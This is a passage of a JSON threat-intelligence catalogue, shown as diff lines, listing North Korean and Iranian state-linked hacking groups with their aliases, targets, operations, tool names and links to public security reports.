"https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/", + "http://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf", + "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity", + "https://www.us-cert.gov/ncas/alerts/TA17-318A", + "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74", + "https://www.sentinelone.com/blog/lazarus-apt-targets-mac-users-poisoned-word-document/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.crowdstrike.com/blog/unprecedented-announcement-fbi-implicates-north-korea-destructive-attacks/", + "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/", + "https://www.welivesecurity.com/2020/06/17/operation-interception-aerospace-military-companies-cyberspies/", + "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", + "https://www.darkreading.com/vulnerabilities---threats/lazarus-group-fancy-bear-most-active-threat-groups-in-2017/d/d-id/1330954?print=yes", + "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://objective-see.com/blog/blog_0x49.html", + "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/", + "https://blog.alyac.co.kr/2827", + "https://securelist.com/lazarus-threatneedle/100803/", + "http://www.fsec.or.kr/common/proc/fsec/bbs/21/fileDownLoad/1235.do", + "https://www.clearskysec.com/operation-dream-job/", + "https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html", + "http://researchcenter.paloaltonetworks.com/2015/11/tdrop2-attacks-suggest-dark-seoul-attackers-return/", + "https://www.alienvault.com/open-threat-exchange/blog/operation-blockbuster-unveils-the-actors-behind-the-sony-attacks", + "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing", + "https://www.hvs-consulting.de/lazarus-report/", + "https://www.us-cert.gov/ncas/alerts/TA17-318B", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://blog.chainalysis.com/reports/lazarus-group-kucoin-exchange-hack", + "https://blog.alyac.co.kr/3814", + "https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + ], + "attck_id": null, + "comment": "Threat Recon.nshc.net alias=SectorA01" + }, + { + "country": "north_korea", + "names": [ + "APT37", + "Ricochet Chollima", + "Venus 121 (\u00ea\u00b8\u0088\u00ec\u0084\u00b1121)", + "Red Eyes", + "THALLIUM", + "Reaper" + ], + "targets": [ + "Primarily South Korea \u00e2\u0080\u0093 though also Japan, Vietnam and the Middle East \u00e2\u0080\u0093 in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare; Scarcruft Tracking: Russia, Nepal, South Korea, China, India, Kuwait and Romania" + ], + "operations": [ + "FreeMilk", + "Evil New Year", + "Erebus", + "Are you Happy?", + "Evil New Year 2018", + "Golden Time", + "North Korean Human Rights" + ], + "description": null, + "tools": [ + "MILKDROP", + "POORAIM", + "SLOWDRIFT", + "Flash Exploit CVE-2016-4117", + "CORALDECK", + "RUHAPPY", + "BabyShark", + "KEVDROID", + "SOUNDWAVE", + "ROKRAT", + "HAPPYWORK", + "GOLDBACKDOOR", + "GELCAPSULE", + "RICECURRY", + "KARAE", + "DOGCALL", + "SHUTTERSPEED", + "KimJongRAT", + "ZUMKONG" + ], + "links": [ + "https://exchange.xforce.ibmcloud.com/collection/Fear-The-Reaper-North-Korean-Group-APT37-dc96e8bdff7573efb87d43d7584c1fbc", + "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", + "https://unit42.paloaltonetworks.com/unit42-reaper-groups-updated-mobile-arsenal/", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/", + "https://www.zdnet.com/article/microsoft-takes-down-50-domains-operated-by-north-korean-hackers/?mid=1#cid=8960026", + "https://securelist.com/blog/research/75082/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/", + "https://0xthreatintel.medium.com/static-analysis-of-bluelight-malware-7bb0a399a54e", + "https://unit42.paloaltonetworks.com/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/?utm_source=rss&utm_medium=rss&utm_campaign=north-korean-apt-inkysquid-infects-victims-using-browser-exploits", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", + "https://blog.alyac.co.kr/3489", + "https://blog.alyac.co.kr/1985", + "https://blogs.microsoft.com/on-the-issues/2019/12/30/microsoft-court-action-against-nation-state-cybercrime/", + "https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html" + ], + "attck_id": null, + "comment": "FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123" + }, + { + "country": "north_korea", + "names": [ + "Andariel", + "Silent Chollima" + ], + "targets": [ + "Information gathering and profit" + ], + "operations": [ + "XEDA", + "DesertWolf", + "Mayday", + "INITROY", + "Vanxatm", + "Sony" + ], + "description": null, + "tools": [ + "RifDoor", + "Phandoor" + ], + "links": [ + "http://online.wsj.com/public/resources/documents/print/WSJ_-A006-20170728.pdf", + "https://www.scmagazineuk.com/war-plans-including-assassination-plan-stolen-by-north-korean-hackers/article/699089/", + "http://www.fsec.or.kr/user/bbs/fsec/21/13/bbsDataView/910.do", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-andariel-reconnaissance-tactics-hint-at-next-targets/", + "https://gsec.hitb.org/materials/sg2017/D1%20-%20Ashley%20Shen%20and%20Moonbeom%20Park%20-%20A%20Deep%20Dive%20into%20the%20Digital%20Weapons%20of%20the%20North%20Korean%20Cyber%20Army.pdf" + ], + "attck_id": null, + "comment": "Lazarus subgroup" + }, + { + "country": "north_korea", + "names": [ + "TA406 (Proofpoint)", + "Velvet Chollima", + "Kimsuki", + "CloudDragon", + "Thallium", + "Kimsuky" + ], + "targets": [ + "This threat actor targets South Korean think tanks, industry, nuclear power operators, and the Ministry of Unification for espionage purposes." + ], + "operations": [], + "description": null, + "tools": [ + "KPortScan", + "Mimikatz", + "PsExec", + "Eternal suite of exploits", + "KGH_SPY", + "Mechanical", + "Procdump", + "Grease", + "NirSoft MailPassView/Network Password Recovery/Remote Desktop PassView/SniffPass/WebBrowserPassView" + ], + "links": [ + "https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/", + "https://apt.securelist.com/#!/threat/972", + "https://www.anomali.com/blog/suspected-north-korean-cyber-espionage-campaign-targets-multiple-foreign-ministries-and-think-tanks#When:14:00:00Z", + "https://blog.alyac.co.kr/3799", + "https://blog.alyac.co.kr/4130", + "http://www.reuters.com/article/us-nuclear-southkorea-northkorea-idUSKBN0MD0GR20150317", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://blog.alyac.co.kr/2243", + "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/", + "https://cybleinc.com/2021/06/03/kimsuky-apt-group-distributes-fake-security-app-disguised-as-kisa-security-program/", + "https://www.dailynk.com/english/north-korean-hackers-mount-phishing-attack-nkhr-groups/", + "https://blog.prevailion.com/2019/09/autumn-aperture-report.html", + "https://blog.yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/", + "http://securelist.com/analysis/57915/the-kimsuky-operation-a-north-korean-apt/", + "https://asec.ahnlab.com/1313?category=342979", + "https://teamt5.org/en/posts/clouddragon-campaign-vpn-zero-day-vulnerability-new-backdoor/", + "https://blog.alyac.co.kr/2906", + "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-threat-insight-paper-triple-threat-N-Korea-aligned-TA406-steals-scams-spies.pdf", + "https://crowdstrike.lookbookhq.com/web-global-threat-report-2019/crowdstrike-2019-gtr", + "https://blog.alyac.co.kr/3368", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-009.pdf", + "https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "http://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "north_korea", + "names": [ + "NoName" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "malware with name \"mySingleMessenger.exe\"" + ], + "links": [ + "http://securityfactory.tistory.com/332" + ], + "attck_id": null, + "comment": "NorthKorea vs Samsung" + }, + { + "country": "north_korea", + "names": [ + "OnionDog" + ], + "targets": [ + "This threat actor targets the South Korean government, transportation, and energy sectors." + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://news.softpedia.com/news/korean-energy-and-transportation-targets-attacked-by-oniondog-apt-501534.shtml", + "http://www.chinadaily.com.cn/china/2016-03/09/content_23794129.htm", + "http://zhuiri.360.cn/upload/APT-C-03-en.pdf" + ], + "attck_id": null, + "comment": "False Positive. APT Training by SK Government" + }, + { + "country": "north_korea", + "names": [ + "APT38", + "TEMP.Hermit" + ], + "targets": [ + "Korean Peninsula, US Aerospace, SWIFT-fraud operations in East Asia" + ], + "operations": [], + "description": "Media, government, but mainly financial institutions in order to raise money for the North Korean regime: Russia, Turkey, US, Poland, Mexico, Brazil, Ururguay, Taiwan, Malaysia, Chile, Vietnam, Philippines", + "tools": [ + "VOLGMER", + "PEACHPIT" + ], + "links": [ + "https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-of-february-17th/", + "http://www.scmagazine.com/sony-hackers-are-still-hacking-researchers-say/article/474166/", + "https://www.fireeye.com/blog/threat-research/2018/10/apt38-details-on-new-north-korean-regime-backed-threat-group.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "north_korea", + "names": [ + "?" + ], + "targets": [ + "Humanitarian Aid Groups" + ], + "operations": [], + "description": null, + "tools": [ + "MaoCheng Dropper" + ], + "links": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "north_korea", + "names": [ + "ElectricFish", + "APT38", + "Stardust Chollima", + "BlueNoroff" + ], + "targets": [ + "Latin America, Mexico, Costa Rica, Chile, Argentina, financial institutions in Asia and Africa in 2018" + ], + "operations": [ + "Far Eastern International Bank" + ], + "description": null, + "tools": [ + "MBR Killer", + "ElectricFish", + "Dimens" + ], + "links": [ + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-108a", + "https://www.thedailybeast.com/north-korean-hackers-caught-snooping-on-chinas-cyber-squad", + "https://techcrunch.com/2019/08/15/cyber-command-north-korea-malware/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/", + "https://app.cdn.lookbookhq.com/lbhq-production/10339/content/original/9dd0e31a-c9c0-4e1c-aea1-f35d3e930f3d/CrowdStrike_GTR_2019_.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "COBALT GYPSY", + "TG-2889", + "Ghambar", + "Cutting Kitten" + ], + "targets": [ + "This threat actor targets governments and private sector entities for espionage and sabotage purposes. It is believed to be responsible for compromising U.S. Navy computers at the Navy Marine Corps Intranet in San Diego, the U.S. energy company Calpine Corporation, Saudi Aramco, Pemex, Qatar Airways, and Korean Air" + ], + "operations": [ + "Cleaver" + ], + "description": null, + "tools": [ + "TinyZBot", + "PupyRAT" + ], + "links": [ + "https://cdn2.hubspot.net/hubfs/270968/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf", + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/" + ], + "attck_id": "G0059", + "comment": "COBALT GYPSY overlap with OilRig" + }, + { + "country": "iran", + "names": [ + "Volatile Kitten", + "Shamoon" + ], + "targets": [ + "This threat actor targets energy sector, oil and gas industry as well as transportation and telecommunication services." + ], + "operations": [], + "description": "wiper", + "tools": [ + "Shamoon / Disttrack" + ], + "links": [ + "https://en.wikipedia.org/wiki/Shamoon", + "http://www.nytimes.com/2012/10/24/business/global/cyberattack-on-saudi-oil-firm-disquiets-us.html" + ], + "attck_id": "S0140", + "comment": null + }, + { + "country": "iran", + "names": [ + "Group 41", + "Clever Kitten" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "PHP Webshell RC SHELL", + "Acunetix Web Vulnerability Scanner" + ], + "links": [ + "http://www.crowdstrike.com/blog/whois-clever-kitten/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Madi" + ], + "targets": [ + "This threat actor compromises engineering firms, government entities, and financial and academic institutions in the United States, Israel, Iran, and Pakistan" + ], + "operations": [], + "description": "Social engineering", + "tools": [], + "links": [ + "https://securelist.com/blog/incidents/33693/the-madi-campaign-part-i-5/", + "https://securelist.com/blog/incidents/33701/the-madi-campaign-part-ii-53/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Cyber fighters of Izz Ad-Din Al Qassam", + "Fraternal Jackal" + ], + "targets": [ + "The websites of Bank of America, JPMorgan Chase, Wells Fargo, and other U.S. financial institutions suffered simultaneous outages due to a coordinated denial of service cyberattack in September 2012. Attackers flooded bank servers with junk traffic, preventing users from online banking. An Iranian group called Izz ad-Din al-Qassam Cyber Fighters initially claimed responsibility for the incident. At the time, the media reported that U.S. intelligence believed the denial of service was in response to U.S. imposed economic sanctions to counter Iran's nuclear program. Seven Iranian individuals linked to the Islamic Revolutionary Guard Corps were eventually indicted by the U.S. Department of Justice in 2016 for their involvement in the incident." + ], + "operations": [ + "Ababil / ApAbabil" + ], + "description": "DoS", + "tools": [], + "links": [ + "http://ddanchev.blogspot.com.es/2012/09/dissecting-operation-ababil-osint.html", + "http://www.nytimes.com/2013/01/09/technology/online-banking-attacks-were-work-of-iran-us-officials-say.html", + "https://www.washingtonpost.com/world/national-security/iran-blamed-for-cyberattacks/2012/09/21/afbe2be4-0412-11e2-9b24-ff730c7f6312_story.html", + "http://pastebin.com/u/QassamCyberFighters" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Chafer", + "ITG07", + "Cadelle", + "Remix Kitten", + "APT39", + "Rana" + ], + "targets": [ + "Airlines, Airports, Transportation, Logistics - worldwide" + ], + "operations": [], + "description": null, + "tools": [ + "Mimikatz", + "Remcom", + "PsExec", + "Web Shells (aspx spy", + "nbtscan", + "HTTPTunnel", + "Cadelspy", + "VNC Bypass scanner", + "PLink", + "plink", + "b374k)", + "SSH Tunnels to Windows Servers", + "Remexi", + "NSSM", + "Impacket / Python exploits", + "CoreSecurity tools", + "RemCom" + ], + "links": [ + "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", + "https://threatconnect.com/blog/research-roundup-apt39-adversaries/", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "http://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets", + "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/", + "https://securityintelligence.com/posts/observations-of-itg07-cyber-operations/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/", + "https://securelist.com/chafer-used-remexi-malware/89538/", + "https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-releases-cybersecurity-advisory-on-previously-undisclosed-iranian-malware-used-to-monitor-dissidents-and-travel-and-telecommunications-companies", + "https://www.bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf" + ], + "attck_id": "G0087", + "comment": "Uses the same C2 infrastructure as OilRig" + }, + { + "country": "iran", + "names": [ + "Prince of Persia", + "APT-C-50" + ], + "targets": [ + "This threat actor targets governments and businesses of multiple countries, including the United States, Israel, and Denmark." + ], + "operations": [], + "description": null, + "tools": [ + "Infy" + ], + "links": [ + "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", + "https://research.checkpoint.com/2021/after-lightning-comes-thunder/", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/", + "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", + "https://blogs.360.cn/post/APT-C-50.html", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", + "https://iranthreats.github.io/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Sima" + ], + "targets": [ + "focus on dissidents, woman rights activists, human rights organizations " + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://iranthreats.github.io/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Chrysene", + "APT34", + "Helix Kitten", + "ITG13", + "COBALT GYPSY", + "Oilrig", + "Twisted Kitten", + "Crambus" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "OopsIE", + "ALMA Communicator", + "BONDUPDATER", + "ELVENDOOR", + "LittleFace)", + "Invoke-Obfuscation", + "PowDesk", + "QUADAGENT", + "Helminth", + "POWBAT", + "ISMDoor", + "SSH Tunnels to Windows Servers", + "Clayslide", + "POWRUNER (PS Backdoor)", + "malicious RTF files CVE-2017-0199 and CVE-2017-11882", + "PsExec", + "PLink", + "Webshells (TwoFace", + "customized Mimikatz", + "DarkSeaGreenShell" + ], + "links": [ + "https://www.forbes.com/sites/thomasbrewster/2017/02/15/oilrig-iran-hackers-cyberespionage-us-turkey-saudi-arabia/#56749aa2468a", + "https://www.dragos.com/blog/20180517Chrysene.html", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", + "https://securityintelligence.com/posts/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/", + "https://blog-cert.opmd.fr/dnspionage-retour-factuel-sur-les-attaques-annoncees-dans-differents-medias/", + "https://www.clearskysec.com/powdesk-apt34/", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "https://researchcenter.paloaltonetworks.com/2017/12/unit42-introducing-the-adversary-playbook-first-up-oilrig/", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", + "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdf", + "http://www.clearskysec.com/oilrig/", + "https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/", + "http://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability%20", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" + ], + "attck_id": "G0049", + "comment": "Uses the same C2 infrastructure as Chafer - which caused a major mixup of OilRig campaigns falsely attributed to Chafer. Also note that Turla used OilRigs implants" + }, + { + "country": "iran", + "names": [ + "CopyKittens", + "DarkHydrus", + "Slayer Kitten", + "LazyMeerkat" + ], + "targets": [ + "Israel\u00e2\u0080\u0099s Ministry of Foreign Affairs and some well-known Israeli academic researchers specializing in Middle East Studies. Israel, Saudi Arabia, United States, Jordan, Germany" + ], + "operations": [ + "Wilted Tulip" + ], + "description": null, + "tools": [ + "TDTESS backdoor", + "Matryoshka v1 and Matryoshka v2", + "Cobalt Strike", + "ZPP", + "NetSrv", + "Vminst" + ], + "links": [ + "http://www.clearskysec.com/tulip/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf", + "http://www.clearskysec.com/copykitten-jpost/", + "https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastructure/" + ], + "attck_id": "G0052", + "comment": "DarkHydrus C2 Infra Overlap" + }, + { + "country": "iran", + "names": [ + "APT35", + "NewsBeef", + "NEWSCASTER", + "Charming Kitten", + "Phosphorus", + "Parastoo", + "Group 83", + "iKittens" + ], + "targets": [ + "This threat actor uses watering hole attacks and fake profiles to lure targets from the U.S. government for espionage purposes." + ], + "operations": [], + "description": "Fake Social Media Account ", + "tools": [ + "ALFA TEaM Shell", + "DROPSHOT", + "MacDownloader", + "SHAPESHIFT", + "malicious HTA files", + "TURNEDUP" + ], + "links": [ + "https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf", + "https://securelist.com/twas-the-night-before/91599/", + "https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/", + "https://www.clearskysec.com/the-kittens-are-back-in-town-3/", + "http://www.clearskysec.com/charmingkitten/", + "https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf", + "https://iranthreats.github.io/resources/macdownloader-macos-malware/", + "https://www.isightpartners.com/2014/05/newscaster-iranian-threat-inside-social-media/", + "https://www.clearskysec.com/the-kittens-are-back-in-town-2/", + "https://github.com/gasgas4/APT_CyberCriminal_Campagin/tree/master/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks", + "https://blogs.microsoft.com/on-the-issues/2019/10/04/recent-cyberattacks-require-us-all-to-be-vigilant/", + "https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://noticeofpleadings.com/phosphorus/files/Sealing.pdf?fbclid=IwAR1HMnynb0AaGyCI-8ejHjH-pNORfuHYOzQdsTrSpin2eRww6rRh-6VK2SI", + "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us", + "https://www.cybereason.com/blog/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage", + "https://cryptome.org/2012/11/parastoo-hacks-iaea.htm", + "https://www.clearskysec.com/wp-content/uploads/2019/09/The-Kittens-Are-Back-in-Town-Charming-Kitten-2019.pdf", + "https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/" + ], + "attck_id": "G0059", + "comment": "IBM=ITG18" + }, + { + "country": "iran", + "names": [ + "Greenbug " + ], + "targets": [ + "Saudi Arabia" + ], + "operations": [], + "description": null, + "tools": [ + "ISMdoor" + ], + "links": [ + "https://www.arbornetworks.com/blog/asert/greenbugs-dns-isms/", + "http://www.clearskysec.com/ismagent/", + "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/february/ism-rat/", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/" + ], + "attck_id": null, + "comment": "Sub group of APT34 according to Mandiant" + }, + { + "country": "iran", + "names": [ + "Refined Kitten", + "APT33", + "Holmium", + "Magic Hound", + "Elfin", + "MAGNALLIUM", + "Timberworm" + ], + "targets": [ + "A threat actor used malware known as Shamoon 2.0 to exfiltrate and delete data from computers in the Saudi transportation sector. Commercial entities, Middle East, US, South Korea, DND focussed entities, Airlines, Airline suppliers. " + ], + "operations": [ + "Stonedrill/ Shamoon2.0" + ], + "description": null, + "tools": [ + "LaZagne", + "Shamoon", + "Remcos", + "DarkComet", + "AutoIt FTP tool", + "Ruler", + "PowerShell downloader (registry.ps1)", + "POSHC2 backdoor", + "POSHC2 (.NET backdoor)", + "Quasar RAT", + "AutoIt backdoor", + "POWERTON", + "SniffPass", + "different keyloggers", + "Gpppassword", + "PUPYRAT", + ".NET FTP tool", + "TURNEDUP" + ], + "links": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "https://www.securityweek.com/iranian-hackers-caused-losses-hundreds-millions-report", + "https://go.recordedfuture.com/hubfs/reports/cta-2019-0626.pdf", + "https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/", + "https://gallery.logrhythm.com/threat-intelligence-reports/shamoon-2-malware-analysis-logrhythm-labs-threat-intelligence-report.pdf", + "https://www.wired.com/story/iran-apt33-industrial-control-systems/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/", + "https://webcache.googleusercontent.com/search?q=cache:Dicnr9-eKKYJ:https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf+&cd=6&hl=en&ct=clnk&gl=ie", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.symantec.com/connect/blogs/shamoon-multi-staged-destructive-attacks-limited-specific-targets" + ], + "attck_id": "G0059", + "comment": "possibly associated with Rocket Kitten and Cobalt Gypsy, Sandcat, use Recruitment themes" + }, + { + "country": "iran", + "names": [ + "TEMP.Beanie", + "Saffron Rose", + "Flying Kitten", + "Rocket Kitten", + "Ajax Security Team", + "Group 26" + ], + "targets": [ + "Saudi Arabia, Israel, US, Iran, high ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences. It seeks out material related to diplomacy, defense, security, journalism, and human rights for espionage purposes." + ], + "operations": [ + "Woolen Goldfish", + "Thamar Reservoir" + ], + "description": null, + "tools": [ + "MPK", + "MagicHound.Leash (IRC Bot)", + "GHOLE / Core Impact", + "Open source tools", + "Puppy RAT", + "CWoolger", + "FireMalv", + "PowGoop (Downloader.Covic)", + ".NETWoolger" + ], + "links": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2014/july/a-new-flying-kitten/", + "https://citizenlab.org/2015/08/iran_two_factor_phishing/", + "http://www.clearskysec.com/thamar-reservoir/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf", + "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing", + "http://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/" + ], + "attck_id": "G0059", + "comment": null + }, + { + "country": "iran", + "names": [ + "?" + ], + "targets": [ + "This threat actor is based in the Middle East (possibly Iran) and targets English- and Persian-language organizations. It is alleged to be the same group behind a compromise of the Danish Ministry of Foreign Affairs." + ], + "operations": [ + "Mermaid" + ], + "description": null, + "tools": [], + "links": [ + 